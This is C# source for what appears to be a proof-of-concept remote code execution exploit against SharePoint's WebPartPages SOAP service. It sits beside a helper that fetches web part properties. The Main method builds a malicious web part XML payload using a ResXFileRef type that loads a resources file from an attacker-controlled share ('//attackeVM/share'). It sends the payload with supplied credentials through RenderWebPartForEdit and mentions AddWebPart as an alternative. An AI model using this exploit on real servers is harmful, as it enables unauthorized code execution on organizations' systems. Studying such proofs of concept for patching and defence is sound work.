private string GetWebPartPropertiesServiceCall(string storageKey, string pageUrl, string weburl) { string webPartXml = string.Empty; try { var service = new WebPartPages.WebPartPagesWebService(); service.Url = weburl + "/_vti_bin/webpartpages.asmx"; service.Timeout = 18000000; if (IsSPOnline) { service.CookieContainer = cookieContainer; } else { service.Credentials = new System.Net.NetworkCredential(uName, pwds, domain); } service.PreAuthenticate = true; // Actual web service call which returns the information in string format webPartXml = service.GetWebPart2(pageUrl, new Guid(storageKey), Storage.Shared, SPWebServiceBehavior.Version3); } catch (Exception ex) { WriteLine("Error in GetWebPartPropertiesServiceCall: " + pageUrl); WriteLine(ex.Message); } return(webPartXml); }
static void Main(string[] args) { try { if (args.Length != 5) { Console.WriteLine("Please provide necessary information:"); Console.WriteLine("SP_soap_RCE_PoC.exe <BaseUrl> <UserName> <Password> <Domain> <Remote_Path_To_Resource_File>"); Console.WriteLine("Example: SP_soap_RCE_PoC.exe http://Sharepont2019/siteofuser2/ user2 P@ssw0rd contoso //attackeVM/share/SP_soap_RCE_PoC.RCE_Resource.resources"); return; } string BaseURL = args[0]; string UserName = args[1]; string Password = args[2]; string Domain = args[3]; string RemotePath = args[4]; var TC_Type = "System.Resources.ResXFileRef, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"; var BF_payload = RemotePath + "; System.Resources.ResourceSet, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"; var URL = BaseURL.TrimEnd(new char[] { '/', ' ' }) + "/_vti_bin/WebPartPages.asmx"; var service = new WebPartPages.WebPartPagesWebService { Url = URL }; service.Credentials = new NetworkCredential(UserName, Password, Domain); //Our WebPart xml with payload string webPartXml = @"<webParts> <webPart xmlns=""http://schemas.microsoft.com/WebPart/v3""> <metaData> <type name=""Microsoft.SharePoint.Portal.WebControls.BusinessDataListWebPart, Microsoft.SharePoint.Portal,Version=12.0.0.0,Culture=neutral,PublicKeyToken=71e9bce111e9429c"" /> <importErrorMessage>Attack may be successful!</importErrorMessage> </metaData> <data> <properties> <property name=""SomeFakeProperty"" type=""" + TC_Type + @""">" + BF_payload + @"</property> </properties> </data> </webPart> </webParts>"; //If an attacker has Add and Customize permissions to only some specific page //he/she can use this method with pageUrl to this page //var pageUrl = "/sitename/SitePages/Home.aspx"; //WebPartPages.Storage storage = WebPartPages.Storage.Personal; //var result = service.AddWebPart(pageUrl, webPartXml, storage); var result = service.RenderWebPartForEdit(webPartXml); Console.WriteLine(result); } catch (Exception e) { Console.WriteLine("{0} Exception caught. with Message {1}", e, e.Message); } }